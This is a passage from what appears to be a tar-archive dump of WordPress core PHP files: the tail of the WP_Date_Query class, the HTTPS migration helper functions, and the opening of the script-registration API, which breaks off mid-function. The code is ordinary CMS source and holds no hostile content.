} else {
$queries[ $dkey ] = $dvalue;
}
}
// Validate the dates passed in the query.
if ( $this->is_first_order_clause( $queries ) ) {
$this->validate_date_values( $queries );
}
// Sanitize the relation parameter.
$queries['relation'] = $this->sanitize_relation( $queries['relation'] );
foreach ( $queries as $key => $q ) {
if ( ! is_array( $q ) || in_array( $key, $this->time_keys, true ) ) {
// This is a first-order query. Trust the values and sanitize when building SQL.
$cleaned_query[ $key ] = $q;
} else {
// Any array without a time key is another query, so we recurse.
$cleaned_query[] = $this->sanitize_query( $q, $queries );
}
}
return $cleaned_query;
}
/**
* Determines whether this is a first-order clause.
*
* Checks to see if the current clause has any time-related keys.
* If so, it's first-order.
*
* @since 4.1.0
*
* @param array $query Query clause.
* @return bool True if this is a first-order clause.
*/
protected function is_first_order_clause( $query ) {
$time_keys = array_intersect( $this->time_keys, array_keys( $query ) );
return ! empty( $time_keys );
}
/**
* Determines and validates what comparison operator to use.
*
* @since 3.7.0
*
* @param array $query A date query or a date subquery.
* @return string The comparison operator.
*/
public function get_compare( $query ) {
if ( ! empty( $query['compare'] )
&& in_array( $query['compare'], array( '=', '!=', '>', '>=', '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true )
) {
return strtoupper( $query['compare'] );
}
return $this->compare;
}
/**
* Validates the given date_query values and triggers errors if something is not valid.
*
* Note that date queries with invalid date ranges are allowed to
* continue (though of course no items will be found for impossible dates).
* This method only generates debug notices for these cases.
*
* @since 4.1.0
*
* @param array $date_query The date_query array.
* @return bool True if all values in the query are valid, false if one or more fail.
*/
public function validate_date_values( $date_query = array() ) {
if ( empty( $date_query ) ) {
return false;
}
$valid = true;
/*
* Validate 'before' and 'after' up front, then let the
* validation routine continue to be sure that all invalid
* values generate errors too.
*/
if ( array_key_exists( 'before', $date_query ) && is_array( $date_query['before'] ) ) {
$valid = $this->validate_date_values( $date_query['before'] );
}
if ( array_key_exists( 'after', $date_query ) && is_array( $date_query['after'] ) ) {
$valid = $this->validate_date_values( $date_query['after'] );
}
// Array containing all min-max checks.
$min_max_checks = array();
// Days per year.
if ( array_key_exists( 'year', $date_query ) ) {
/*
* If a year exists in the date query, we can use it to get the days.
* If multiple years are provided (as in a BETWEEN), use the first one.
*/
if ( is_array( $date_query['year'] ) ) {
$_year = reset( $date_query['year'] );
} else {
$_year = $date_query['year'];
}
$max_days_of_year = (int) gmdate( 'z', mktime( 0, 0, 0, 12, 31, $_year ) ) + 1;
} else {
// Otherwise we use the max of 366 (leap-year).
$max_days_of_year = 366;
}
$min_max_checks['dayofyear'] = array(
'min' => 1,
'max' => $max_days_of_year,
);
// Days per week.
$min_max_checks['dayofweek'] = array(
'min' => 1,
'max' => 7,
);
// Days per week.
$min_max_checks['dayofweek_iso'] = array(
'min' => 1,
'max' => 7,
);
// Months per year.
$min_max_checks['month'] = array(
'min' => 1,
'max' => 12,
);
// Weeks per year.
if ( isset( $_year ) ) {
/*
* If we have a specific year, use it to calculate number of weeks.
* Note: the number of weeks in a year is the date in which Dec 28 appears.
*/
$week_count = gmdate( 'W', mktime( 0, 0, 0, 12, 28, $_year ) );
} else {
// Otherwise set the week-count to a maximum of 53.
$week_count = 53;
}
$min_max_checks['week'] = array(
'min' => 1,
'max' => $week_count,
);
// Days per month.
$min_max_checks['day'] = array(
'min' => 1,
'max' => 31,
);
// Hours per day.
$min_max_checks['hour'] = array(
'min' => 0,
'max' => 23,
);
// Minutes per hour.
$min_max_checks['minute'] = array(
'min' => 0,
'max' => 59,
);
// Seconds per minute.
$min_max_checks['second'] = array(
'min' => 0,
'max' => 59,
);
// Concatenate and throw a notice for each invalid value.
foreach ( $min_max_checks as $key => $check ) {
if ( ! array_key_exists( $key, $date_query ) ) {
continue;
}
// Throw a notice for each failing value.
foreach ( (array) $date_query[ $key ] as $_value ) {
$is_between = $_value >= $check['min'] && $_value <= $check['max'];
if ( ! is_numeric( $_value ) || ! $is_between ) {
$error = sprintf(
/* translators: Date query invalid date message. 1: Invalid value, 2: Type of value, 3: Minimum valid value, 4: Maximum valid value. */
__( 'Invalid value %1$s for %2$s. Expected value should be between %3$s and %4$s.' ),
'<code>' . esc_html( $_value ) . '</code>',
'<code>' . esc_html( $key ) . '</code>',
'<code>' . esc_html( $check['min'] ) . '</code>',
'<code>' . esc_html( $check['max'] ) . '</code>'
);
_doing_it_wrong( __CLASS__, $error, '4.1.0' );
$valid = false;
}
}
}
// If we already have invalid date messages, don't bother running through checkdate().
if ( ! $valid ) {
return $valid;
}
$day_month_year_error_msg = '';
$day_exists = array_key_exists( 'day', $date_query ) && is_numeric( $date_query['day'] );
$month_exists = array_key_exists( 'month', $date_query ) && is_numeric( $date_query['month'] );
$year_exists = array_key_exists( 'year', $date_query ) && is_numeric( $date_query['year'] );
if ( $day_exists && $month_exists && $year_exists ) {
// 1. Checking day, month, year combination.
if ( ! wp_checkdate( $date_query['month'], $date_query['day'], $date_query['year'], sprintf( '%s-%s-%s', $date_query['year'], $date_query['month'], $date_query['day'] ) ) ) {
$day_month_year_error_msg = sprintf(
/* translators: 1: Year, 2: Month, 3: Day of month. */
__( 'The following values do not describe a valid date: year %1$s, month %2$s, day %3$s.' ),
'<code>' . esc_html( $date_query['year'] ) . '</code>',
'<code>' . esc_html( $date_query['month'] ) . '</code>',
'<code>' . esc_html( $date_query['day'] ) . '</code>'
);
$valid = false;
}
} elseif ( $day_exists && $month_exists ) {
/*
* 2. checking day, month combination
* We use 2012 because, as a leap year, it's the most permissive.
*/
if ( ! wp_checkdate( $date_query['month'], $date_query['day'], 2012, sprintf( '2012-%s-%s', $date_query['month'], $date_query['day'] ) ) ) {
$day_month_year_error_msg = sprintf(
/* translators: 1: Month, 2: Day of month. */
__( 'The following values do not describe a valid date: month %1$s, day %2$s.' ),
'<code>' . esc_html( $date_query['month'] ) . '</code>',
'<code>' . esc_html( $date_query['day'] ) . '</code>'
);
$valid = false;
}
}
if ( ! empty( $day_month_year_error_msg ) ) {
_doing_it_wrong( __CLASS__, $day_month_year_error_msg, '4.1.0' );
}
return $valid;
}
/**
* Validates a column name parameter.
*
* Column names without a table prefix (like 'post_date') are checked against a list of
* allowed and known tables, and then, if found, have a table prefix (such as 'wp_posts.')
* prepended. Prefixed column names (such as 'wp_posts.post_date') bypass this allowed
* check, and are only sanitized to remove illegal characters.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $column The user-supplied column name.
* @return string A validated column name value.
*/
public function validate_column( $column ) {
global $wpdb;
$valid_columns = array(
'post_date', // Part of $wpdb->posts.
'post_date_gmt', // Part of $wpdb->posts.
'post_modified', // Part of $wpdb->posts.
'post_modified_gmt', // Part of $wpdb->posts.
'comment_date', // Part of $wpdb->comments.
'comment_date_gmt', // Part of $wpdb->comments.
'user_registered', // Part of $wpdb->users.
);
if ( is_multisite() ) {
$valid_columns = array_merge(
$valid_columns,
array(
'registered', // Part of $wpdb->blogs.
'last_updated', // Part of $wpdb->blogs.
)
);
}
// Attempt to detect a table prefix.
if ( ! str_contains( $column, '.' ) ) {
/**
* Filters the list of valid date query columns.
*
* @since 3.7.0
* @since 4.1.0 Added 'user_registered' to the default recognized columns.
* @since 4.6.0 Added 'registered' and 'last_updated' to the default recognized columns.
*
* @param string[] $valid_columns An array of valid date query columns. Defaults
* are 'post_date', 'post_date_gmt', 'post_modified',
* 'post_modified_gmt', 'comment_date', 'comment_date_gmt',
* 'user_registered', 'registered', 'last_updated'.
*/
if ( ! in_array( $column, apply_filters( 'date_query_valid_columns', $valid_columns ), true ) ) {
$column = 'post_date';
}
$known_columns = array(
$wpdb->posts => array(
'post_date',
'post_date_gmt',
'post_modified',
'post_modified_gmt',
),
$wpdb->comments => array(
'comment_date',
'comment_date_gmt',
),
$wpdb->users => array(
'user_registered',
),
);
if ( is_multisite() ) {
$known_columns[ $wpdb->blogs ] = array(
'registered',
'last_updated',
);
}
// If it's a known column name, add the appropriate table prefix.
foreach ( $known_columns as $table_name => $table_columns ) {
if ( in_array( $column, $table_columns, true ) ) {
$column = $table_name . '.' . $column;
break;
}
}
}
// Remove unsafe characters.
return preg_replace( '/[^a-zA-Z0-9_$\.]/', '', $column );
}
/**
* Generates WHERE clause to be appended to a main query.
*
* @since 3.7.0
*
* @return string MySQL WHERE clause.
*/
public function get_sql() {
$sql = $this->get_sql_clauses();
$where = $sql['where'];
/**
* Filters the date query WHERE clause.
*
* @since 3.7.0
*
* @param string $where WHERE clause of the date query.
* @param WP_Date_Query $query The WP_Date_Query instance.
*/
return apply_filters( 'get_date_sql', $where, $this );
}
/**
* Generates SQL clauses to be appended to a main query.
*
* Called by the public WP_Date_Query::get_sql(), this method is abstracted
* out to maintain parity with the other Query classes.
*
* @since 4.1.0
*
* @return string[] {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
protected function get_sql_clauses() {
$sql = $this->get_sql_for_query( $this->queries );
if ( ! empty( $sql['where'] ) ) {
$sql['where'] = ' AND ' . $sql['where'];
}
return $sql;
}
/**
* Generates SQL clauses for a single query array.
*
* If nested subqueries are found, this method recurses the tree to
* produce the properly nested SQL.
*
* @since 4.1.0
*
* @param array $query Query to parse.
* @param int $depth Optional. Number of tree levels deep we currently are.
* Used to calculate indentation. Default 0.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to a single query array.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
protected function get_sql_for_query( $query, $depth = 0 ) {
$sql_chunks = array(
'join' => array(),
'where' => array(),
);
$sql = array(
'join' => '',
'where' => '',
);
$indent = '';
for ( $i = 0; $i < $depth; $i++ ) {
$indent .= ' ';
}
foreach ( $query as $key => $clause ) {
if ( 'relation' === $key ) {
$relation = $query['relation'];
} elseif ( is_array( $clause ) ) {
// This is a first-order clause.
if ( $this->is_first_order_clause( $clause ) ) {
$clause_sql = $this->get_sql_for_clause( $clause, $query );
$where_count = count( $clause_sql['where'] );
if ( ! $where_count ) {
$sql_chunks['where'][] = '';
} elseif ( 1 === $where_count ) {
$sql_chunks['where'][] = $clause_sql['where'][0];
} else {
$sql_chunks['where'][] = '( ' . implode( ' AND ', $clause_sql['where'] ) . ' )';
}
$sql_chunks['join'] = array_merge( $sql_chunks['join'], $clause_sql['join'] );
// This is a subquery, so we recurse.
} else {
$clause_sql = $this->get_sql_for_query( $clause, $depth + 1 );
$sql_chunks['where'][] = $clause_sql['where'];
$sql_chunks['join'][] = $clause_sql['join'];
}
}
}
// Filter to remove empties.
$sql_chunks['join'] = array_filter( $sql_chunks['join'] );
$sql_chunks['where'] = array_filter( $sql_chunks['where'] );
if ( empty( $relation ) ) {
$relation = 'AND';
}
// Filter duplicate JOIN clauses and combine into a single string.
if ( ! empty( $sql_chunks['join'] ) ) {
$sql['join'] = implode( ' ', array_unique( $sql_chunks['join'] ) );
}
// Generate a single WHERE clause with proper brackets and indentation.
if ( ! empty( $sql_chunks['where'] ) ) {
$sql['where'] = '( ' . "\n " . $indent . implode( ' ' . "\n " . $indent . $relation . ' ' . "\n " . $indent, $sql_chunks['where'] ) . "\n" . $indent . ')';
}
return $sql;
}
/**
* Turns a single date clause into pieces for a WHERE clause.
*
* A wrapper for get_sql_for_clause(), included here for backward
* compatibility while retaining the naming convention across Query classes.
*
* @since 3.7.0
*
* @param array $query Date query arguments.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string[] $join Array of SQL fragments to append to the main JOIN clause.
* @type string[] $where Array of SQL fragments to append to the main WHERE clause.
* }
*/
protected function get_sql_for_subquery( $query ) {
return $this->get_sql_for_clause( $query, '' );
}
/**
* Turns a first-order date query into SQL for a WHERE clause.
*
* @since 4.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query Date query clause.
* @param array $parent_query Parent query of the current date query.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string[] $join Array of SQL fragments to append to the main JOIN clause.
* @type string[] $where Array of SQL fragments to append to the main WHERE clause.
* }
*/
protected function get_sql_for_clause( $query, $parent_query ) {
global $wpdb;
// The sub-parts of a $where part.
$where_parts = array();
$column = ( ! empty( $query['column'] ) ) ? esc_sql( $query['column'] ) : $this->column;
$column = $this->validate_column( $column );
$compare = $this->get_compare( $query );
$inclusive = ! empty( $query['inclusive'] );
// Assign greater- and less-than values.
$lt = '<';
$gt = '>';
if ( $inclusive ) {
$lt .= '=';
$gt .= '=';
}
// Range queries.
if ( ! empty( $query['after'] ) ) {
$where_parts[] = $wpdb->prepare( "$column $gt %s", $this->build_mysql_datetime( $query['after'], ! $inclusive ) );
}
if ( ! empty( $query['before'] ) ) {
$where_parts[] = $wpdb->prepare( "$column $lt %s", $this->build_mysql_datetime( $query['before'], $inclusive ) );
}
// Specific value queries.
$date_units = array(
'YEAR' => array( 'year' ),
'MONTH' => array( 'month', 'monthnum' ),
'_wp_mysql_week' => array( 'week', 'w' ),
'DAYOFYEAR' => array( 'dayofyear' ),
'DAYOFMONTH' => array( 'day' ),
'DAYOFWEEK' => array( 'dayofweek' ),
'WEEKDAY' => array( 'dayofweek_iso' ),
);
// Check of the possible date units and add them to the query.
foreach ( $date_units as $sql_part => $query_parts ) {
foreach ( $query_parts as $query_part ) {
if ( isset( $query[ $query_part ] ) ) {
$value = $this->build_value( $compare, $query[ $query_part ] );
if ( $value ) {
switch ( $sql_part ) {
case '_wp_mysql_week':
$where_parts[] = _wp_mysql_week( $column ) . " $compare $value";
break;
case 'WEEKDAY':
$where_parts[] = "$sql_part( $column ) + 1 $compare $value";
break;
default:
$where_parts[] = "$sql_part( $column ) $compare $value";
}
break;
}
}
}
}
if ( isset( $query['hour'] ) || isset( $query['minute'] ) || isset( $query['second'] ) ) {
// Avoid notices.
foreach ( array( 'hour', 'minute', 'second' ) as $unit ) {
if ( ! isset( $query[ $unit ] ) ) {
$query[ $unit ] = null;
}
}
$time_query = $this->build_time_query( $column, $compare, $query['hour'], $query['minute'], $query['second'] );
if ( $time_query ) {
$where_parts[] = $time_query;
}
}
/*
* Return an array of 'join' and 'where' for compatibility
* with other query classes.
*/
return array(
'where' => $where_parts,
'join' => array(),
);
}
/**
* Builds and validates a value string based on the comparison operator.
*
* @since 3.7.0
*
* @param string $compare The compare operator to use.
* @param string|array $value The value.
* @return string|false|int The value to be used in SQL or false on error.
*/
public function build_value( $compare, $value ) {
if ( ! isset( $value ) ) {
return false;
}
switch ( $compare ) {
case 'IN':
case 'NOT IN':
$value = (array) $value;
// Remove non-numeric values.
$value = array_filter( $value, 'is_numeric' );
if ( empty( $value ) ) {
return false;
}
return '(' . implode( ',', array_map( 'intval', $value ) ) . ')';
case 'BETWEEN':
case 'NOT BETWEEN':
if ( ! is_array( $value ) || 2 !== count( $value ) ) {
$value = array( $value, $value );
} else {
$value = array_values( $value );
}
// If either value is non-numeric, bail.
foreach ( $value as $v ) {
if ( ! is_numeric( $v ) ) {
return false;
}
}
$value = array_map( 'intval', $value );
return $value[0] . ' AND ' . $value[1];
default:
if ( ! is_numeric( $value ) ) {
return false;
}
return (int) $value;
}
}
/**
* Builds a MySQL format date/time based on some query parameters.
*
* You can pass an array of values (year, month, etc.) with missing parameter values being defaulted to
* either the maximum or minimum values (controlled by the $default_to parameter). Alternatively you can
* pass a string that will be passed to date_create().
*
* @since 3.7.0
*
* @param string|array $datetime An array of parameters or a strtotime() string.
* @param bool $default_to_max Whether to round up incomplete dates. Supported by values
* of $datetime that are arrays, or string values that are a
* subset of MySQL date format ('Y', 'Y-m', 'Y-m-d', 'Y-m-d H:i').
* Default: false.
* @return string|false A MySQL format date/time or false on failure.
*/
public function build_mysql_datetime( $datetime, $default_to_max = false ) {
if ( ! is_array( $datetime ) ) {
/*
* Try to parse some common date formats, so we can detect
* the level of precision and support the 'inclusive' parameter.
*/
if ( preg_match( '/^(\d{4})$/', $datetime, $matches ) ) {
// Y
$datetime = array(
'year' => (int) $matches[1],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})$/', $datetime, $matches ) ) {
// Y-m
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2})$/', $datetime, $matches ) ) {
// Y-m-d
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
'day' => (int) $matches[3],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2}) (\d{2}):(\d{2})$/', $datetime, $matches ) ) {
// Y-m-d H:i
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
'day' => (int) $matches[3],
'hour' => (int) $matches[4],
'minute' => (int) $matches[5],
);
}
// If no match is found, we don't support default_to_max.
if ( ! is_array( $datetime ) ) {
$wp_timezone = wp_timezone();
// Assume local timezone if not provided.
$dt = date_create( $datetime, $wp_timezone );
if ( false === $dt ) {
return gmdate( 'Y-m-d H:i:s', false );
}
return $dt->setTimezone( $wp_timezone )->format( 'Y-m-d H:i:s' );
}
}
$datetime = array_map( 'absint', $datetime );
if ( ! isset( $datetime['year'] ) ) {
$datetime['year'] = current_time( 'Y' );
}
if ( ! isset( $datetime['month'] ) ) {
$datetime['month'] = ( $default_to_max ) ? 12 : 1;
}
if ( ! isset( $datetime['day'] ) ) {
$datetime['day'] = ( $default_to_max ) ? (int) gmdate( 't', mktime( 0, 0, 0, $datetime['month'], 1, $datetime['year'] ) ) : 1;
}
if ( ! isset( $datetime['hour'] ) ) {
$datetime['hour'] = ( $default_to_max ) ? 23 : 0;
}
if ( ! isset( $datetime['minute'] ) ) {
$datetime['minute'] = ( $default_to_max ) ? 59 : 0;
}
if ( ! isset( $datetime['second'] ) ) {
$datetime['second'] = ( $default_to_max ) ? 59 : 0;
}
return sprintf( '%04d-%02d-%02d %02d:%02d:%02d', $datetime['year'], $datetime['month'], $datetime['day'], $datetime['hour'], $datetime['minute'], $datetime['second'] );
}
/**
* Builds a query string for comparing time values (hour, minute, second).
*
* If just hour, minute, or second is set than a normal comparison will be done.
* However if multiple values are passed, a pseudo-decimal time will be created
* in order to be able to accurately compare against.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $column The column to query against. Needs to be pre-validated!
* @param string $compare The comparison operator. Needs to be pre-validated!
* @param int|null $hour Optional. An hour value (0-23).
* @param int|null $minute Optional. A minute value (0-59).
* @param int|null $second Optional. A second value (0-59).
* @return string|false A query part or false on failure.
*/
public function build_time_query( $column, $compare, $hour = null, $minute = null, $second = null ) {
global $wpdb;
// Have to have at least one.
if ( ! isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) {
return false;
}
// Complex combined queries aren't supported for multi-value queries.
if ( in_array( $compare, array( 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true ) ) {
$return = array();
$value = $this->build_value( $compare, $hour );
if ( false !== $value ) {
$return[] = "HOUR( $column ) $compare $value";
}
$value = $this->build_value( $compare, $minute );
if ( false !== $value ) {
$return[] = "MINUTE( $column ) $compare $value";
}
$value = $this->build_value( $compare, $second );
if ( false !== $value ) {
$return[] = "SECOND( $column ) $compare $value";
}
return implode( ' AND ', $return );
}
// Cases where just one unit is set.
if ( isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) {
$value = $this->build_value( $compare, $hour );
if ( false !== $value ) {
return "HOUR( $column ) $compare $value";
}
} elseif ( ! isset( $hour ) && isset( $minute ) && ! isset( $second ) ) {
$value = $this->build_value( $compare, $minute );
if ( false !== $value ) {
return "MINUTE( $column ) $compare $value";
}
} elseif ( ! isset( $hour ) && ! isset( $minute ) && isset( $second ) ) {
$value = $this->build_value( $compare, $second );
if ( false !== $value ) {
return "SECOND( $column ) $compare $value";
}
}
// Single units were already handled. Since hour & second isn't allowed, minute must to be set.
if ( ! isset( $minute ) ) {
return false;
}
$format = '';
$time = '';
// Hour.
if ( null !== $hour ) {
$format .= '%H.';
$time .= sprintf( '%02d', $hour ) . '.';
} else {
$format .= '0.';
$time .= '0.';
}
// Minute.
$format .= '%i';
$time .= sprintf( '%02d', $minute );
if ( isset( $second ) ) {
$format .= '%s';
$time .= sprintf( '%02d', $second );
}
return $wpdb->prepare( "DATE_FORMAT( $column, %s ) $compare %f", $format, $time );
}
/**
* Sanitizes a 'relation' operator.
*
* @since 6.0.3
*
* @param string $relation Raw relation key from the query argument.
* @return string Sanitized relation. Either 'AND' or 'OR'.
*/
public function sanitize_relation( $relation ) {
if ( 'OR' === strtoupper( $relation ) ) {
return 'OR';
} else {
return 'AND';
}
}
}
https-migration-20260607003752-20260621081107.php 0000666 00000011205 15224151220 0013351 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
functions.wp-scripts.php 0000666 00000035717 15224151220 0011412 0 ustar 00 <?php
/**
* Dependencies API: Scripts functions
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Initializes $wp_scripts if it has not been set.
*
* @since 4.2.0
*
* @global WP_Scripts $wp_scripts
*
* @return WP_Scripts WP_Scripts instance.
*/
function wp_scripts() {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
$wp_scripts = new WP_Scripts();
}
return $wp_scripts;
}
/**
* Helper function to output a _doing_it_wrong message when applicable.
*
* @ignore
* @since 4.2.0
* @since 5.5.0 Added the `$handle` parameter.
*
* @param string $function_name Function name.
* @param string $handle Optional. Name of the script or stylesheet that was
* registered or enqueued too early. Default empty.
*/
function _wp_scripts_maybe_doing_it_wrong( $function_name, $handle = '' ) {
if ( did_action( 'init' ) || did_action( 'wp_enqueue_scripts' )
|| did_action( 'admin_enqueue_scripts' ) || did_action( 'login_enqueue_scripts' )
) {
return;
}
$message = sprintf(
/* translators: 1: wp_enqueue_scripts, 2: admin_enqueue_scripts, 3: login_enqueue_scripts */
__( 'Scripts and styles should not be registered or enqueued until the %1$s, %2$s, or %3$s hooks.' ),
'<code>wp_enqueue_scripts</code>',
'<code>admin_enqueue_scripts</code>',
'<code>login_enqueue_scripts</code>'
);
if ( $handle ) {
$message .= ' ' . sprintf(
/* translators: %s: Name of the script or stylesheet. */
__( 'This notice was triggered by the %s handle.' ),
'<code>' . $handle . '</code>'
);
}
_doing_it_wrong(
$function_name,
$message,
'3.3.0'
);
}
/**
* Prints scripts in document head that are in the $handles queue.
*
* Called by admin-header.php and {@see 'wp_head'} hook. Since it is called by wp_head on every page load,
* the function does not instantiate the WP_Scripts object unless script names are explicitly passed.
* Makes use of already-instantiated `$wp_scripts` global if present. Use provided {@see 'wp_print_scripts'}
* hook to register/enqueue new scripts.
*
* @see WP_Scripts::do_item()
* @since 2.1.0
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
* @param string|string[]|false $handles Optional. Scripts to be printed. Default 'false'.
* @return string[] On success, an array of handles of processed WP_Dependencies items; otherwise, an empty array.
*/
function wp_print_scripts( $handles = false ) {
global $wp_scripts;
/**
* Fires before scripts in the $handles queue are printed.
*
* @since 2.1.0
*/
do_action( 'wp_print_scripts' );
if ( '' === $handles ) { // For 'wp_head'.
$handles = false;
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__ );
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
if ( ! $handles ) {
return array(); // No need to instantiate if nothing is there.
}
}
return wp_scripts()->do_items( $handles );
}
/**
* Adds extra code to a registered script.
*
* Code will only be added if the script is already in the queue.
* Accepts a string `$data` containing the code. If two or more code blocks
* are added to the same script `$handle`, they will be printed in the order
* they were added, i.e. the latter added code can redeclare the previous.
*
* @since 4.5.0
*
* @see WP_Scripts::add_inline_script()
*
* @param string $handle Name of the script to add the inline script to.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script before the handle
* or after. Default 'after'.
* @return bool True on success, false on failure.
*/
function wp_add_inline_script( $handle, $data, $position = 'after' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
if ( false !== stripos( $data, '</script>' ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: <script>, 2: wp_add_inline_script() */
__( 'Do not pass %1$s tags to %2$s.' ),
'<code><script></code>',
'<code>wp_add_inline_script()</code>'
),
'4.5.0'
);
$data = trim( preg_replace( '#<script[^>]*>(.*)</script>#is', '$1', $data ) );
}
return wp_scripts()->add_inline_script( $handle, $data, $position );
}
/**
* Registers a new script.
*
* Registers a script to be enqueued later using the wp_enqueue_script() function.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
*
* @since 2.1.0
* @since 4.3.0 A return value was added.
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string|false $src Full URL of the script, or path of the script relative to the WordPress root directory.
* If source is set to false, script is an alias of other scripts it depends on.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
* @return bool Whether the script has been registered. True on success, false on failure.
*/
function wp_register_script( $handle, $src, $deps = array(), $ver = false, $args = array() ) {
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
$registered = $wp_scripts->add( $handle, $src, $deps, $ver );
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $handle, 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
